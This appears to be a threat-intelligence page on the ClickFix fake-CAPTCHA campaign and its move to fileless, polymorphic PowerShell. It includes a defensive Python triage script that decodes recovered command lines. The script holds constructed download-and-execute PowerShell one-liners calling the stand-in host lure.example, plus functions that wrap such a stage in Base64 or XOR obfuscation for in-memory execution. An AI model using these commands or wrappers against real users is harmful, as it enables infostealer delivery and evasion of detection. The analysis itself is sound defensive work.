The Evolution of ClickFix: From Cleartext to Server-Side Polymorphism
Essential information
- Published
- 20/05/2026 11:12
- Modified
- 21/05/2026 16:46
- Tags
- 2026-05-20, base64 obfuscation, clickfix, deerstealer, fake captcha, fileless execution, infostealer, powershell, server-side polymorphism, vidar, xor encryption
- Related entities
- 200 observables, 18 techniques (MITRE ATT&CK), 2 malware, 200 others
Description
The ClickFix campaign has evolved from simple disk-based infections to obfuscated, fileless attacks. Victims are lured by fake CAPTCHA pages into running a malicious PowerShell command themselves. The initial variants used a cleartext command that downloaded a batch script, which in turn deployed the DeerStealer infostealer. Later variants moved to fileless execution: the PowerShell stage is hidden behind XOR encryption or Base64 encoding of a compressed payload, and is decoded and run in memory rather than written to disk. The latest and most dangerous evolution is server-side polymorphism, where the attacker's infrastructure generates a uniquely obfuscated payload for each victim, so no two victims receive the same command text; this variant delivers the Vidar infostealer. The campaign has been active since March 2026, with activity surging through May, and relies on roughly 4,500 live domains. Both the XOR and Base64 variants run their decoded stage in memory, fetch executables from attacker-controlled infrastructure, and remove their own artifacts to hinder forensic analysis.
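The three wrappers the report describes (cleartext, Base64 of a compressed stage, XOR) all end in the same place: a PowerShell stage that holds a download URL. The following triage helper is an added example written for this page, not code from the report or its authors. It takes a command line as an analyst would recover it (from the RunMRU registry key, Sysmon Event ID 1 or EDR telemetry), classifies it as one of the three variants, recovers the decoded second stage and extracts the URL it contacts. All sample command lines are constructed here in the shape of those variants; the `.example` domains, the `STAGE2` script and the wrapper layouts are assumptions for illustration, not observables from the report. The final function models server-side polymorphism by wrapping one stage 2 with a different key per "victim" and shows that the decoded content stays identical while every delivered command text differs.

```python
"""Triage helper for ClickFix-style PowerShell one-liners (added example, not report code).

Classifies a recovered command line as cleartext, Base64 + compression or XOR,
returns the decoded second stage and the URLs it carries. Sample command lines
below are constructed for this example; the domains are reserved .example names.
"""
import base64
import re
import zlib

URL_RE = re.compile(r"https?://[\w.\-]+(?::\d+)?(?:/[\w.\-/%?=&]*)?", re.I)
# FromBase64String('...') loaders and -EncodedCommand / -enc blobs
B64_RE = re.compile(
    r"(?:FromBase64String\(\s*['\"]|-e(?:ncodedcommand|nc)?\s+)([A-Za-z0-9+/=]{16,})", re.I)
# @(12,34,...) byte arrays and a literal single-byte key after -bxor
XOR_ARRAY_RE = re.compile(r"@\(\s*((?:\d{1,3}\s*,\s*)+\d{1,3})\s*\)")
XOR_KEY_RE = re.compile(r"-bxor\s+(0x[0-9a-f]+|\d+)", re.I)


def _looks_like_script(data: bytes) -> bool:
    """Printable ASCII that carries a URL: enough to rank candidate decodes."""
    return all(32 <= c < 127 or c in (9, 10, 13) for c in data) and b"http" in data.lower()


def _decode_base64_stage(blob: str):
    raw = base64.b64decode(blob)
    # PowerShell DeflateStream is raw DEFLATE (wbits -15); GzipStream is gzip (31).
    for wbits in (-15, 31, 15):
        try:
            out = zlib.decompress(raw, wbits)
        except zlib.error:
            continue
        if _looks_like_script(out):
            return out.decode("ascii")
    # Uncompressed blob: -EncodedCommand is UTF-16LE, other loaders use UTF-8.
    for enc in ("utf-16-le", "utf-8"):
        try:
            text = raw.decode(enc)
        except UnicodeDecodeError:
            continue
        if text.isascii() and _looks_like_script(text.encode()):
            return text
    return None


def _decode_xor_stage(cmd: str):
    m = XOR_ARRAY_RE.search(cmd)
    if not m:
        return None
    data = bytes(int(x) for x in m.group(1).split(","))
    key_match = XOR_KEY_RE.search(cmd)
    # Key held in a variable or computed at runtime: brute-force all 256 single-byte keys.
    candidates = [int(key_match.group(1), 0)] if key_match else range(256)
    for key in candidates:
        out = bytes(b ^ key for b in data)
        if _looks_like_script(out):
            return out.decode("ascii")
    return None


def triage(cmdline: str) -> dict:
    """Classify a one-liner and return the decoded stage and the URLs it carries."""
    decoded = _decode_xor_stage(cmdline)
    variant = "xor"
    if decoded is None:
        m = B64_RE.search(cmdline)
        if m:
            variant, decoded = "base64", (_decode_base64_stage(m.group(1)) or "")
        else:
            variant, decoded = "cleartext", cmdline
    return {"variant": variant, "stage2": decoded, "urls": sorted(set(URL_RE.findall(decoded)))}


# --- constructed samples in the shape of the three variants (not real IOCs) ---
STAGE2 = "$u='http://lure.example/update/s.exe';$p=Join-Path $env:TEMP 'svc.exe';iwr $u -OutFile $p;saps $p"
CLEARTEXT_SAMPLE = ('powershell -w hidden -c "Invoke-WebRequest -Uri http://lure.example/cf.bat '
                    '-OutFile $env:TEMP\\cf.bat; cmd /c $env:TEMP\\cf.bat"')


def make_base64_sample(stage2: str) -> str:
    """Base64 + raw DEFLATE wrapper, the shape a DeflateStream-based loader expects."""
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)
    blob = base64.b64encode(comp.compress(stage2.encode()) + comp.flush()).decode()
    return ('powershell -w hidden -c "iex ([IO.StreamReader]::new([IO.Compression.DeflateStream]::new('
            "[IO.MemoryStream]::new([Convert]::FromBase64String('%s')),"
            '[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()"' % blob)


def make_xor_sample(stage2: str, key: int, inline_key: bool = True) -> str:
    """Single-byte XOR wrapper; with inline_key=False the key sits in $k and must be brute-forced."""
    arr = ",".join(str(b ^ key) for b in stage2.encode())
    if inline_key:
        return f'powershell -w hidden -c "$b=@({arr});iex(-join($b|%{{[char]($_ -bxor 0x{key:x})}}))"'
    return f'powershell -w hidden -c "$k={key};$b=@({arr});iex(-join($b|%{{[char]($_ -bxor $k)}}))"'


def polymorphism_check(stage2: str, keys=(0x13, 0x5C, 0xA7)):
    """Model server-side polymorphism: one stage 2, a different wrapper per victim.
    Returns (distinct one-liner strings, URLs recovered): the command text differs
    every time, the decoded content does not."""
    samples = [make_xor_sample(stage2, k, inline_key=False) for k in keys]
    urls = {u for s in samples for u in triage(s)["urls"]}
    return len(set(samples)), urls


if __name__ == "__main__":
    for sample in (CLEARTEXT_SAMPLE, make_base64_sample(STAGE2), make_xor_sample(STAGE2, 0x2A)):
        r = triage(sample)
        print(r["variant"], r["urls"])
    print(polymorphism_check(STAGE2))
```

The design point is that detections and hunting queries must key on what the command decodes to (the URL, the download-and-execute pattern, the in-memory `iex`), not on the command-line string: the polymorphism check shows three distinct one-liners that static string or hash blocklists would treat as unrelated all resolving to one stage 2. The brute-force path only covers single-byte XOR keys; a sample using a multi-byte key, a different encoding or a runtime-derived key would need the decoder extended before the URL could be recovered.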